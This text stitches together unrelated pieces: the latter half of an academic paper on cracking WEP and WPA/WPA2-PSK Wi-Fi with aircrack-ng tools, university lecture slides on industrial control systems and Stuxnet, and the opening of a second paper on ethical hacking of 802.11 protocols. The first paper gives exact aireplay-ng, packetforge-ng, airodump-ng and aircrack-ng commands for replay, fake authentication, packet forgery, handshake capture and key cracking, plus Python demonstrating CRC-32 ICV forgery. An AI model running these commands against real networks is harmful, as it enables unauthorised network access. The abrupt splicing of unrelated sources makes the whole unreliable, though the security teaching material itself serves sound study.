The attacker uses the MAC address of the client (AC:36:13:6C:6F:4A), in order not to be rejected by the AP, to repeatedly replay the received ARP Request packets and receive ARP Responses, generating more packets with weak IVs, using the command "aireplay-ng --arpreplay -e SecurityTest -h AC:36:13:6C:6F:4A wlan0mon". The attacker successfully generates more packets (70593), as shown in figure 7.

Figure 7: Successful Generation of ARP Packets by Attacker

3.2.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
A fake authentication was conducted and the attacker was successfully associated with the AP as a result of the absence of mutual authentication. The following indicates the experiment steps:

The attacker uses the command "aireplay-ng --fakeauth 0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to conduct a fake authentication using its own MAC address (00:C0:CA:83:01:CD) and the AP MAC address (98:FC:11:EE:41:25), since the AP only authenticates its clients. Figure 8 shows how the authentication request and association request were successfully acknowledged by the AP. This means that the attacker got connected to the AP.

Figure 8: Successful Fake Authentication and Association with Target AP by Attacker

3.2.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
The WEP security protocol could not detect modified packets or differentiate between original and forged packets. The following steps indicate the existence of the vulnerability:

The attacker uses the command "aireplay-ng --chopchop -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD wlan0mon" to decrypt the captured encrypted data packets and obtain the keystream (replay_dec-0713-213506.xor) and plaintext (replay_dec-0713-213506.cap), as shown in figure 9.
Figure 9: Capture of Keystream and Plaintext files

The attacker modified or forged new packets out of the keystream and computed the checksum using the command "packetforge-ng -0 -a 98:FC:11:EE:41:25 -h 00:C0:CA:83:01:CD -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0713-213506.xor -w packetforge-test", saving the packets to a file called packetforge-test.

The command "aireplay-ng -2 -r packetforge-test wlan0mon" was used to inject the forged packets into the AP traffic to generate data packets with new IVs, as shown in figure 10. These generated packets help to speed up the cracking of the WEP key.

Figure 10: Generation of New IVs from Forged Packets

3.2.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
The "aircrack-ng" tool was run in parallel as more packets with weak IVs were generated. With 51326 IVs, 698 possible keys were tested and the WEP key was successfully cracked, as shown in figure 11.

Figure 11: WEP Key Successfully Cracked

3.3 Exploiting Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
Three vulnerabilities associated with the security protocol were discovered:
1. The four-way handshake is transmitted unencrypted (plaintext).
2. The Message Integrity Check (MIC) is unencrypted (plaintext).
3. The derivation formulae for computing the PMK and PTK are known to the attacker.

The attacker requires the capture of a valid four-way handshake (which contains the MIC and the inputs needed to derive the PMK and PTK) and a wordlist to conduct a dictionary attack to crack the PSK (passphrase), which is unknown to the attacker.

Figure 12 shows a successful capture of the four-way handshake, saved to a file called wpa-handshake using the command "airodump-ng --channel 6 --bssid 98:FC:11:EE:41:25 --write wpa-handshake wlan0mon".

Figure 12: Successful Capture of WPA Handshake

3.3.1 Cracking of WPA/WPA2-PSK Passphrase
With the captured WPA handshake and a wordlist or dictionary of passwords, aircrack-ng was used to crack the WPA passphrase using the command "aircrack-ng wpa-handshake-01.cap -w passwords". The passphrase or WPA key was successfully cracked, as shown in figure 13.

Figure 13: WPA-PSK Key (Passphrase) Successfully Cracked

4. RESULTS ANALYSIS
The vulnerabilities discovered enabled a successful crack of the wireless security protocols.
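As an added illustration of the ICV weakness exploited in Sections 3.2.3 and 3.2.4 (example code written for this page, not the paper's and not part of aircrack-ng): a toy WEP-style frame protected by a CRC-32 ICV under a stream cipher, showing that the linearity of CRC-32 lets a party who knows neither the key nor the plaintext flip payload bits and keep the ICV valid, while the same edit against a keyed HMAC-SHA1 MIC is rejected. The keystream, MIC key and frame contents are constructed stand-ins (fixed pseudo-random bytes in place of RC4 output).

```python
"""Added example: why WEP's CRC-32 ICV does not give integrity (not the paper's code).

WEP sends  C = (P || CRC32(P)) XOR keystream.  CRC-32 is affine over GF(2):
    CRC32(P XOR D) == CRC32(P) XOR CRC32(D) XOR CRC32(0...0)
so a party who knows neither the key nor P can XOR a chosen D into the
ciphertext and fix the encrypted ICV by a constant that depends only on D.
A keyed MIC (here HMAC-SHA1) has no such relation, so the same edit is caught.
"""
import hashlib
import hmac
import zlib

# Constructed stand-ins: a fixed pseudo-random keystream in place of RC4
# output, a MIC key for the hardened variant, and an intercepted frame.
KEYSTREAM = hashlib.sha512(b"constructed RC4 keystream stand-in").digest()
MIC_KEY = b"constructed 16-byte key!"
FRAME = b"SRC=10.0.0.5;DST=10.0.0.1;CMD=HOLD"


def crc_bytes(data: bytes) -> bytes:
    return zlib.crc32(data).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(plaintext: bytes, keystream: bytes = KEYSTREAM) -> bytes:
    """Sender appends the CRC-32 ICV, then XORs with the keystream."""
    return xor(plaintext + crc_bytes(plaintext), keystream)


def wep_decrypt(ciphertext: bytes, keystream: bytes = KEYSTREAM):
    """Receiver strips the keystream and accepts only if the ICV checks out."""
    body = xor(ciphertext, keystream)
    plaintext, icv = body[:-4], body[-4:]
    return plaintext if crc_bytes(plaintext) == icv else None


def flip_without_key(ciphertext: bytes, delta: bytes) -> bytes:
    """Apply plaintext change `delta` (same length as the payload) to the
    ciphertext and adjust the encrypted ICV using only CRC-32 linearity."""
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return xor(ciphertext, delta + icv_delta.to_bytes(4, "little"))


def mic_encrypt(plaintext: bytes, keystream: bytes = KEYSTREAM, key: bytes = MIC_KEY) -> bytes:
    """Hardened variant: keyed HMAC-SHA1 (truncated to 8 bytes) instead of CRC-32."""
    mic = hmac.new(key, plaintext, hashlib.sha1).digest()[:8]
    return xor(plaintext + mic, keystream)


def mic_decrypt(ciphertext: bytes, keystream: bytes = KEYSTREAM, key: bytes = MIC_KEY):
    body = xor(ciphertext, keystream)
    plaintext, mic = body[:-8], body[-8:]
    expected = hmac.new(key, plaintext, hashlib.sha1).digest()[:8]
    return plaintext if hmac.compare_digest(mic, expected) else None


def demo() -> dict:
    """Edit the destination field of an intercepted frame without the key."""
    target = FRAME.replace(b"DST=10.0.0.1", b"DST=10.0.0.9")
    delta = xor(FRAME, target)                    # bit-flips turning FRAME into target
    forged_wep = flip_without_key(wep_encrypt(FRAME), delta)
    forged_mic = xor(mic_encrypt(FRAME), delta + bytes(8))  # same flips, MIC untouched
    return {
        "wep_accepted": wep_decrypt(forged_wep),  # receiver accepts the altered frame
        "mic_accepted": mic_decrypt(forged_mic),  # HMAC variant rejects it (None)
    }


if __name__ == "__main__":
    print(demo())
```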

4.1 Analysis on Vulnerabilities in IEEE 802.11 WEP Encryption Protocol

4.1.1 No Replay Protection Mechanism in WEP
Packets (70593) were successfully captured and repeatedly replayed into the network to generate more packets with weak IVs, which aided in the cracking of the WEP key. The ARP packets (18112) used for the replay attack were successfully captured and injected into the network to generate packets, as shown in figure 14.

Figure 14: ARP Packets Generated by Attacker

4.1.2 No Mutual Authentication makes it Vulnerable to Fake Authentication Attack
The attacker successfully performed a fake authentication and got associated with the AP, gaining access to network resources. Figure 15 shows the acknowledgement of a successful authentication and association by the AP, as highlighted.

Figure 15: Successful Fake Authentication and Association with Target AP by Attacker

The attacker's MAC address (00:C0:CA:83:01:CD) was listed among the discovered clients connected to the AP with MAC address 98:FC:11:EE:41:25, as shown in figure 16.

Figure 16: Attacker Connects to Access Point

4.1.3 WEP is Vulnerable to Message Modification and Injection Due to ICV Insecurity
Using the "chopchop" attack method, the attacker was able to decrypt encrypted packets without knowing the secret key. The attacker chops off the last byte of a captured encrypted packet, substitutes a guessed value for that byte, recalculates the encrypted checksum and injects the modified packet into the network; if the AP accepts the modified packet, the attacker's guess was correct, otherwise the packet is rejected by the AP. An invalid packet results from an incorrect ICV, which means the attacker must compute the checksum to validate forged or modified packets. The decrypted packet yields the keystream file (replay_dec-0713-213506.xor) and the plaintext file (replay_dec-0713-213506.cap), as shown in figure 17. The captured keystream is used to generate forged packets that the AP accepts as valid.

Figure 17: Saved Plaintext and Keystream files

4.1.4 Cracking of IEEE 802.11 WEP Encryption Protocol Key
WEP was based on confidentiality, not authorization; it uses the RC4 stream cipher for encryption and a CRC-32 checksum as its integrity check. WEP is vulnerable to attacks due to the implementation of its IV mechanism. The 24-bit IV space gets exhausted within a few hours and the IVs are then duplicated. The chopchop attack was used to crack the WEP secret key. The chopchop attack method, developed by KoreK, exploits a vulnerability in the WEP security protocol itself rather than a weakness in the RC4 algorithm. Without knowing the secret key, the attacker was able to capture and decrypt encrypted packets to obtain the keystream and plaintext. The keystream and plaintext are XORed to produce fake ciphertext, which is injected into the network to generate more packets with weak IVs. The IVs are transmitted in clear text, concatenated with the secret shared key. As more weak IVs are generated, the chance of cracking the WEP key increases. With 51326 weak IVs generated, the WEP key was successfully cracked, as shown in figure 18.

The outcome shows that WEP is vulnerable to attack. The WEP key can be cracked without any active client connected to the network. Also, without knowing the WEP key, the plaintext and the keystream can be obtained and used to crack the key.

Figure 18: WEP Key Successfully Cracked

4.2 Analysis on Vulnerabilities in IEEE 802.11 WPA/WPA2-PSK Encryption Protocol
WPA/WPA2-PSK is vulnerable to attack because the four-way handshake is transmitted unencrypted (plaintext). All the parameters used in the mutual authentication (PMK and PTK generation) between the supplicant and the authenticator (AP) are known to an attacker except the passphrase. The derivation formulae for the PMK and PTK are as follows:

PMK = PBKDF2(Passphrase, SSID, SSIDlen, 4096, 256)

PTK = Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)
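As an added illustration of the two formulae above and of the handshake description in Section 2.5 (example code written for this page, not the paper's and not part of aircrack-ng): the PMK and PTK derivation as specified in IEEE 802.11i, showing that once the AP MAC, client MAC, ANonce and SNonce have been read from a captured handshake, the passphrase is the only input that separates the supplicant from an observer, and that the SSID salts the PMK so a precomputed table for one network does not carry over to another. The MAC addresses and the SSID SecurityTest are those quoted in the paper; the nonces and passphrases are constructed, and the PMK check value is the test vector published in IEEE 802.11i Annex H.

```python
"""Added example: IEEE 802.11i PMK and PTK derivation (not the paper's code).

PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
PTK = PRF(PMK, "Pairwise key expansion",
          min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))

Every PTK input except the passphrase travels in the clear in the four-way
handshake, so an observer who guesses the passphrase derives the same keys the
supplicant does; passphrase entropy is the only thing left to defend.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 rounds, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbits: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: nbits // 8]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK for CCMP (384 bits) split into KCK (MIC key), KEK and TK (data key).

    The min/max ordering means both sides build the same input regardless of
    which address or nonce each considers its own.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 384)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


# Fields an observer reads from the captured handshake. The MACs are the AP and
# client addresses quoted in the paper; the nonces are constructed, not captured.
CAPTURED = {
    "aa": bytes.fromhex("98FC11EE4125"),
    "spa": bytes.fromhex("AC36136C6F4A"),
    "anonce": hashlib.sha256(b"constructed ANonce").digest(),
    "snonce": hashlib.sha256(b"constructed SNonce").digest(),
}


def keys_from_guess(passphrase: str, ssid: str, fields: dict = CAPTURED) -> dict:
    """Keys that anyone (supplicant, AP or observer) derives from a passphrase
    plus the public handshake fields."""
    return derive_ptk(derive_pmk(passphrase, ssid), **fields)


def observer_matches_supplicant(true_passphrase: str, guess: str, ssid: str) -> bool:
    """True when an observer's guess reproduces the supplicant's KCK, i.e. when
    the guess equals the real passphrase. With a wrong guess nothing else in
    the handshake helps, because every other input is already public."""
    return keys_from_guess(guess, ssid)["kck"] == keys_from_guess(true_passphrase, ssid)["kck"]


if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print("right guess:", observer_matches_supplicant("correct horse", "correct horse", "SecurityTest"))
    print("wrong guess:", observer_matches_supplicant("correct horse", "password1", "SecurityTest"))
```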
The captured four-way handshake was analyzed with Wireshark. The first message of the EAPOL handshake was transmitted from the AP to the supplicant and comprises a random number (256 bits) called the ANonce, used for PTK generation at the supplicant. The AP MAC address and ANonce were known, as highlighted in figure 19.

Figure 19: First Message of the WPA Four-way Handshake (ANonce and AP MAC Address)

The supplicant sends the second message as a reply to the first EAPOL handshake message, sending its SNonce in plain text to the authenticator, protected by a cryptographic hash (HMAC-SHA1) called the MIC, for the integrity of the key installed on the supplicant side, as highlighted in figure 20. A MIC is computed for each PTK by the AP and compared with the captured MIC in the second message of the EAPOL handshake. If they are equal, the attacker has derived the same PTK and the passphrase is cracked.

Figure 20: Second Message of the WPA Four-way Handshake (SNonce, MIC and Client MAC Address)

The passphrase of the WPA/WPA2-PSK network was successfully obtained, as shown in figure 21, indicating the PMK, PTK and the MIC computed with the cryptographic hash algorithm (HMAC-SHA1). The outcome of this study implies that WPA/WPA2-PSK is vulnerable to dictionary attack. An attacker can crack WPA/WPA2-PSK if the passphrase exists in the dictionary or wordlist.

Figure 21: Successful Crack of WPA/WPA2-PSK Passphrase

5. CONCLUSION
In assessing the security of IEEE 802.11 WLAN security protocols using penetration testing, it is proven that WEP and WPA/WPA2-PSK are vulnerable to attack. In WEP, the entire IV space is 24 bits, which gets exhausted within a short time and causes IVs to repeat as more packets are generated. Cracking the WEP key depends on generating more weak IVs; once enough weak IVs are generated the key will be successfully cracked. The aim of the CRC-32 checksum (ICV) is to verify data integrity by preventing alteration of data packets in transit. The ICV is related to the plaintext, not to the ciphertext. Fake ciphertext does not affect the ICV; therefore, the ICV is unable to achieve its aim. In the case of WPA/WPA2-PSK, the four-way handshake between the client and the AP is easily captured by an attacker, and the PMK and PTK can then be determined, since they depend on the captured four-way handshake. WPA/WPA2-PSK will be successfully cracked only if the passphrase exists in the attacker's wordlist or dictionary file, since the PMK and PTK can then be determined.

6. REFERENCES
[1] Lee P., Stewart D. and Calugar-Pop C., (2014). Technology, Media & Telecommunications Predictions. London: Deloitte report, pp. 1-60, 2014.
[2] Waliullah Md., Moniruzzaman A. B. M., and Sadekur Rahman Md., (2015). An Experimental Study Analysis of Security Attacks at IEEE 802.11 Wireless Local Area Network. International Journal of Future Generation Communication and Networking, vol. 10, no. 4, pp. 9-18.
[3] Ola G., (2013). Penetration Testing on a Wireless Network Using Backtrack 5. Turku University of Applied Sciences.
[4] Chen Z., Guo S., Zheng K., and Li H., (2009). "Research on man-in-the-middle denial of service attack in SIP VoIP," Networks Security, Wireless Communications and Trusted Computing, NSWCTC, vol. 2, pp. 263-266, Apr. 2009.
[5] Appiah J. K., (2014). Network and Systems Security Assessment using penetration testing in a university environment: The case of Central University College. Kwame Nkrumah University of Science and Technology, Kumasi.
[6] National Institute of Standards and Technology (NIST), (2008). Technical Guide to Information Security Testing and Assessment, Special Publication 800-115, Gaithersburg.
[7] Praveen L., Ravi S. Y., and Keshava R. M., (2011). Securing IEEE 802.11g WLAN Using OPENVPN and Its Impact Analysis. International Journal of Network Security & Its Applications (IJNSA), Vol. 3, No. 6, November 2011.
[8] Kropeit T., (2015). Don't Trust Open Hotspots: Wi-Fi Hacker Detection and Privacy Protection via Smartphone. Ruhr-Universitat Bochum.
[9] Forouzan B., (2008). Data Communications & Networking. 4th edition. New York: McGraw-Hill.
[10] L'ubomir Z., (2012). Security of Wi-Fi Networks. Comenius University, Bratislava.
[11] Bilger J., Cosand H., Singh N. and Xavier J., (2005). Security and Legal Implications of Wireless Networks, Protocols, and Devices.
[12] Shweta T., Pratim K., Sumedh K., and Aniket G., (2013). "Study of Vulnerabilities of Wlan Security Protocols," Journal, Dep. Comput. Eng. Fr. C. Rodrigues Inst. Technol. Vashi, Navi Mumbai, no. September, pp. 109-112, 2013.
[13] Memon A. Q., Raza A. H. and Iqbal S., (2010). WLAN Security. Halmstad University School of Information Science, Computer and Electrical Engineering. Technical report, IDE1013, April 2010.
[14] Kumkar V., Tiwari A., Tiwari P., Gupta A. and Shrawne S., (2012). Vulnerabilities of Wireless Security protocols (WEP and WPA2). International Journal of Advanced Research in Computer Engineering & Technology, Volume 1, Issue 2, April 2012.
[15] Park T., Wang H., Cho M., Shin K. G., (2002). Enhanced Wired Equivalent Privacy for IEEE 802.11 Wireless LANs. The University of Michigan.
[16] Intercop Net Labs, (2002). "What's Wrong with WEP?" Retrieved from http://www.opus1.com/www/whitepapers/whatswrongwithwep.pdf (Accessed on May 10, 2018).
[17] Borisov N., Goldberg I., and Wagner D., (2001). Security of the WEP algorithm. Retrieved from http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html (Accessed on April 24, 2018).
[18] Kiemele L., (2011). Wireless Network Security. V00154530.
[19] Zahur Y. and Yang T., (2004). "Wireless LAN Security and Laboratory Designs". University of Houston Clear Lake CCSC, Journal of Computing Sciences in Colleges, vol. 19, no. 3, January 2004, pp. 44-60.
[20] Bulbul H. I., Batmaz I. and Ozel M., (2008). Wireless Network Security: Comparison of WEP (Wired Equivalent Privacy) Mechanism, WPA (Wi-Fi Protected Access) and RSN (Robust Security Network) Security Protocols. Gazi University.
[21] Gupta S., (2012). Wireless Network Security Protocols - A Comparative Study. IJETAE, 2012.
[22] Alselwi A., (2015). Wireless Security Protocol in DNA Bio-Inspired Network. Liverpool John Moores University.
[23] Kurup L., Shah V. and Shah D., (2014). Comparative Study of Attacks on Security Protocols. International Journal of Advanced Research in Computer Engineering & Technology (IJARCET), Volume 3, Issue 8, August 2014.
[24] Fluhrer S., Mantin I. and Shamir A., (2001). Weaknesses in the Key Scheduling Algorithm of RC4. Eighth Annual Workshop on Selected Areas in Cryptography, August 2001.
[25] Hulin K., Locke C., Mealey P., and Pham A., (2010). "Analysis of wireless security vulnerabilities, attacks, and methods of protection". Information Security Semester Project, 2010.
[26] Robyns P., (2014). Wireless Network Privacy. Hasselt University.
[27] Zarch S. H. M., Jalilzadeh F., and Yazdanivaghef M., (2012). Encryption as an Impressive Instrumentation in Decrease Wireless WAN Vulnerabilities. International Journal of Scientific and Research Publications, Volume 2, Issue 12, December 2012, ISSN 2250-3153.
[28] Papaleo G., (2006). Wireless Network Intrusion Detection System: Implementation and Architectural Issues. Universita degli Studi di Genova.
[29] Ciampa M. D., (2012). Security+ Guide to Network Security Fundamentals. Course Technology, Cengage Learning.
[30] Laverty D., (n.d.). WPA versus 802.11i (WPA2): How your Choice Affects your Wireless Network Security. http://www.openxtra.co.uk/articles/wpa-vs-80211i.php
[31] Mkubulo D., (2007). Analysis of Wi-Fi Security Protocols and Authentication Delay. The Florida State University, FAMU-FSU College of Engineering.
[32] Vanhoef M., and Piessens F., (2017). Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2. imec-DistriNet, KU Leuven.
[33] Ramachandran V., (2011). BackTrack 5 Wireless Penetration Testing: Master Bleeding Edge Wireless Testing Techniques with BackTrack 5. Packt Publishing, Birmingham, UK.
[34] Noh J., Kim J., and Cho S., (2018). Secure Authentication and Four-Way Handshake Scheme for Protected Individual Communication in Public Wi-Fi Networks. IEEE Access, DOI 10.1109/ACCESS.2018.2809614.
[35] Kaplanis C., (2015). Detection and prevention of Man in the Middle attacks in Wi-Fi Technology.
[36] Stimpson T., Liu L., Zhang J., Hill R., Liu W. and Zhan Y., (2012). "Assessment of Security and Vulnerability of Home Wireless Networks", IEEE 9th International Conference on Fuzzy Systems and Knowledge Discovery, Chongqing, China, 29-31 May 2012, pp. 2133-2137.


Critical System Security
UFCF7P-15-M

Dr Andrew McCarthy

Module Objectives

• Demonstrate a deep and systematic understanding of conventional and contemporary ICS implementations and their comparison to IT systems in the context of cyber security
• Undertake the analysis of the cyber threat landscape in ICS and evaluate current cyber protection approaches in the field
• Design and evaluate improvements in current cyber protection approaches to tackle the cyber security challenges that arise in ICS
• Select appropriate risk modelling methods in ICS and critically evaluate their effectiveness on risk measurement
• Critically apply the Kill Chain process to model complex cyber security incident scenarios in ICS and develop situational awareness
• Demonstrate an understanding of industry-specific regulations and standards for the protection of ICS

Module delivery plan

• This module runs for 11 weeks.
• The module delivery plan can be found on Blackboard.
• This is a live document and may change; all changes will be clearly communicated to you.
• Please ensure you are keeping up. All lectures and tutorial introductions will be recorded and uploaded to Blackboard 24 hours after the event.

About the module assessment

• Written Assessment 100% - Due 2nd May 2024
• Not all work completed within this module will be assessed; however, all activities have been designed to help you gain the most from this module, allowing you to develop and practice skills, reinforcing knowledge.
Structure of support and resources

• Module Leader:
Dr Andrew McCarthy – [email protected]

• Module Tutors:
• Dr Faiza Medjek - [email protected]
• Dr Nabil Djedjig - [email protected]

Structure of support and resources

• 1 hour weekly lecture (these will be recorded and available on Blackboard 24 hours after the lecture).
• 2 hour weekly tutorial (please see the planner in the module handbook). Some of the tutorial sessions will require pre-reading; to get the most from these sessions, please ensure you come prepared, having completed any readings.

Equipment required for this module

• This module requires no specialist equipment; however, there are some extra activities which will require a series of virtual machines, which you will be provided with.
• Windows 10 image
• Debian image
• Kali image
• Images are available from here: go.uwe.ac.uk/CSSVMS

Blackboard
This will be our main communication platform.
What is a system?

“The central concept ‘system’ embodies the idea of a set of elements connected
together which form a whole, this showing properties which are properties of the
whole, rather than properties of its component parts.” (Checkland, 1982, p. 3)

These elements may be physical objects, people or even ideas such as those
that make up the system of a thought. Instead of the word “elements” I use the
word “components”.

What is a system?

Examples:
- Car
- Transportation system
- Living organism

The performance of the system depends on the way its components fit together, not on the performance of each component taken separately.

System > Sum of components

What is an Industrial Control System (ICS)?

“A general term that encompasses several types of control systems, including Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCSs), and other control system configurations such as skid-mounted Programmable Logic Controllers (PLCs) often found in the industrial sectors and critical infrastructures” (Stouffer et al., 2011)

“A collection of personnel, hardware, and software that can affect or influence the safe, secure, and reliable operation of an industrial process” (ISA/IEC-62443-1-1)
What is a Critical System?

• A Critical System is any system whose “failure” could threaten the environment, human life or the existence of the organisation which operates the system. (I. Sommerville, 2020)

Examples of Critical Systems
• Communication systems: telephone switching systems, aircraft radio systems, etc.
• Embedded control systems for process plants, medical devices, etc.
• Command and control systems such as air-traffic control systems, disaster management systems, etc.
• Financial systems such as foreign exchange transaction systems, account management systems, etc.

Module Overview
Goals of this module

In this module we will focus on Industrial Control Systems and SCADA systems.

- Nature and purpose
- Components
- Threats
- Attacks
- Risk assessment
- Associated standards

Industries reliant on ICS
Can you think of any more examples?

• Factory automation - automotive, electronics
• Process industry - water treatment, food
• Energy industry - gas, oil
• Service industry - transport, logistics
Basic blocks of a control system

• This is a typical control system in its simplest form.
• Control systems can become very complex, but it is worth keeping this model in mind.
• What are the attack areas in this model? (Consider where changes to these signals could affect the process.)

Typical ICS components

Concepts of ICS
PURDUE ENTERPRISE REFERENCE ARCHITECTURE (PERA)

• Dealing with complexity, Industrial Control Systems can be characterised by a hierarchy of technology layers (the Purdue model). Higher layers of this taxonomy are more related to more classical security problems.
• From a security perspective:
  • Enterprise Zone (CIA) - Level 4
  • Control Zone (safety and reliability) - Level 3
  • Field Zone (safety and reliability) - Levels 2-0

ICS Discrete process
ICS Process model

• Materials move from station to station as a unit to make a product.
• A car manufacturing plant is an example; each car can be broken down and returned to its original materials.
ICS Batch process
ICS Process model

• Materials are mixed in specific quantities to make an intermediate or end product.
• Bread making, for example: mixing the flour, yeast and water to make the dough. Once the dough is made, the process cannot be undone and returned to the raw materials.

ICS Continuous model
ICS Process model

• A process which runs without interruption.
• Water treatment and gas or oil pipelines would be examples of a continuous process.

ICS Hybrid model
ICS Process model

• Otherwise known as reactive, this is a system which contains both a discrete and a continuous process, allowing changes to be made to the continuous process based upon variables which may change.
• Smart motorways or power grids would be examples.
Summary of this week's tutorial

• During this week's lab we will be covering:
  • Characteristics of an ICS (and begin a Glossary of terms)
  • Typical field devices
  • How these devices fit into an ICS
  • Typical inputs/outputs (Digital/Analog)

This week's reading

NIST Guide to Industrial Control Systems (ICS) Security (The document can be found in the reading room)

Next?

• Next week we will be covering:
  • People, Roles and Responsibilities – Differences between IT and ICS
  • Writing a process for a given scenario
  • Identifying appropriate sensors and actuators (covered during today's tutorial)
  • Produce a logic diagram for the given scenario
References

Checkland, P. 1999, Soft systems methodology: a 30-year retrospective, Wiley, Chichester.

I. Sommerville, “Critical Systems Engineering,” available at https://courses.cs.washington.edu/courses/cse466/05sp/pdfs/lectures/L12-Critical_Systems.pdf [retrieved on 5 Jan 2020]

NIST, “Guide to Industrial Control Systems (ICS) Security,” available at //www.ccn-cert.cni.es/publico/InfraestructurasCriticaspublico/Guide%20to%20Industrial%20Control%20.pdf [retrieved on 6 January 2020]

T. J. Williams, “The Purdue enterprise reference architecture,” Computers in Industry, vol. 24, no. 2, pp. 141–158, 1994.
STUXNET
Overview of Stuxnet

Primarily written to target an industrial control system or set of similar systems.

Its final goal is to reprogram ICSs by modifying code on PLCs to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment [6].

Stuxnet: Attack scenario

• First, the attackers needed to conduct reconnaissance.
• As each PLC is configured in a unique manner, the attackers would first need the ICS's schematics. These design documents may have been stolen by an insider or even retrieved by other malware (an early version of Stuxnet or another malicious binary).
• The attackers would have needed to obtain the digital certificates from someone who may have physically entered the premises of the two companies and stolen them.
• The final version of Stuxnet couldn't have been developed without this knowledge [6].

Stuxnet: Attack scenario

• Attackers would need to set up a mirrored environment that would include the necessary ICS hardware, such as PLCs, modules, and peripherals, in order to test their code. The full cycle may have taken six months and five to ten core develop<br>ers, not counting numerous other individuals, such as quality assurance and management [6].
• Weaponisation phase in the cyber kill chain model (we'll talk about this in future lectures).

Stuxnet: Attack scenario

• To infect their target, Stuxnet would need to be introduced into the target environment. This may have occurred by infecting a willing or unknowing third party, such as a contractor who perhaps had access to the facility, or an insider. The original infection may have been introduced by removable drive.
• Once Stuxnet had infected a computer within the organization it began to spread in search of Field PGs, which are typical Windows computers but used to program PLCs.

Stuxnet: Attack scenario

• Since most of these computers (Field PGs) are non-networked, Stuxnet would first try to spread to other computers on the LAN through a zero-day vulnerability, a two-year-old vulnerability, infecting Step 7 projects, and through removable drives. Propagation through a LAN likely served as the first step and propagation through removable drives as a means to cover the last and final hop to a Field PG that is never connected to an untrusted network.

Stuxnet: Attack scenario

• When Stuxnet finally found a suitable computer (Field PG), one that ran Step 7, it would then modify the code on the PLC. These modifications likely sabotaged the system.
• Victims attempting to verify the issue would not see any rogue PLC code as Stuxnet hides its modifications.

Stuxnet: Attack scenario

What were the vulnerable points in the attack scenario?


Journal of Xi’an Shiyou University, Natural Science Edition ISSN: 1673-064X

Ethical Hacking of IEEE 802.11 Encryption Protocols

Sandesh Jain, Sarthak Pruthi, Vivek Yadav
Department of Information Technology
Delhi Technological University, Delhi, India

Abstract - The widespread usage of smart terminals such as smartphones, which provide significant convenience in our daily lives, has resulted in an increase in information security issues. Researchers are increasingly concerned about network security and calculations. As more devices join a wireless network, important and sensitive data is transferred over the air between users, making data packets easy to sniff and grab. The purpose of this project is to perform penetration testing to find flaws in the WEP, WPA, and 802.11i WPA2 and WPA3 security protocols, as well as to conduct anonymous attacks against them using the macchanger script. Penetration testing in WEP was carried out using Kali Linux and its Aircrack-ng tools, which exploited the 4-way handshake for WPA/WPA2.

Index Terms— Encryption, Protocols, WPA, WPA2, four-way handshake, KRACK, WPA3.

I. INTRODUCTION

Wireless networks are one of the more recent innovations that the internet has brought into our lives. Wireless technology is the mechanism of sharing information using invisible waves in the air, using electromagnetic or acoustic waves. The challenge of information security is becoming increasingly critical as wireless network technology develops and gets more widely used.

Wireless Fidelity (WiFi) is a modern wireless network model defined by the IEEE 802.11 standard. A hostile activity targeting wireless system information or wireless networks is known as a wireless attack. The wireless network has several faults of its own. It uses radio waves to send signals and must first establish a connection before being used. A penetration test is a malicious attack on a target system that achieves access control by emulating an attacker's techniques and methods with the client's legal authorization; it is a test method for evaluating information system security control measures. This paper provides a WiFi penetration test method based on Kali Linux that uses methods such as monitoring, sniffing, capturing, data analysis, WiFi password cracking, pseudo-wireless access point spoofing, and other techniques to improve the security of WiFi networks.

II. LITERATURE REVIEW

In most residential and business networks, the IEEE 802.11 standard defines WLAN characteristics; 802 deals with LAN and MAN, while .11 deals with WLAN. The available radio frequency spectrum varies significantly depending on the regulatory domain. Collision-avoidance carrier-sense multiple access and medium access control are used in the 802.11 protocol family, which means that equipment listens for other users on a channel before transmitting each frame. The first edition of the standard was released in 1997. The protocols are typically used in conjunction with IEEE 802.2 to carry Internet Protocol traffic. 802.11a, 802.11b, and 802.11g are the most extensively used and supported standards.

III. TOOLS AND TECHNOLOGIES USED

The tools and technologies used to implement and perform the working model of WiFi encryption were:
● WiFi Adapter
● Raspberry Pi kit
● WiFi Router
● Raspberry Pi (Power Adapter)
● Bluetooth Adapter
● Kali Linux
● Aircrack-ng, Airodump-ng, Aireplay-ng

IV. WLAN PROTOCOLS

A. Working of WLAN Protocols

1. Wired Equivalent Privacy (WEP)

